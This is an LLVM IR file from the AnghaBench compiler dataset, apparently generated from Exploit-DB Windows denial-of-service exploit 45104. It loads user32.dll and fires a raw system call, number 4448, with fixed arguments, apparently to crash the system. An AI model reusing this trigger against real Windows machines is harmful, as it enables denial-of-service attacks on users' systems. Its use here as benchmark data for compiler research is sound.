; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/dos/extr_45104.c__tmain.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/dos/extr_45104.c__tmain.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [11 x i32] [i32 117, i32 115, i32 101, i32 114, i32 51, i32 50, i32 46, i32 100, i32 108, i32 108, i32 0], align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @_tmain(i32 %0, i32** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32**, align 8
  %5 = alloca i32, align 4
  %6 = alloca i32, align 4
  store i32 %0, i32* %3, align 4
  store i32** %1, i32*** %4, align 8
  store i32 0, i32* %5, align 4
  store i32 4448, i32* %6, align 4
  %7 = call i32 @LoadLibrary(i8* bitcast ([11 x i32]* @.str to i8*))
  %8 = load i32, i32* %6, align 4
  %9 = call i64 @SystemCall32(i32 %8, i32 4, i32 0, i32 8)
  %10 = trunc i64 %9 to i32
  store i32 %10, i32* %5, align 4
  ret i32 0
}

declare dso_local i32 @LoadLibrary(i8*) #1

declare dso_local i64 @SystemCall32(i32, i32, i32, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
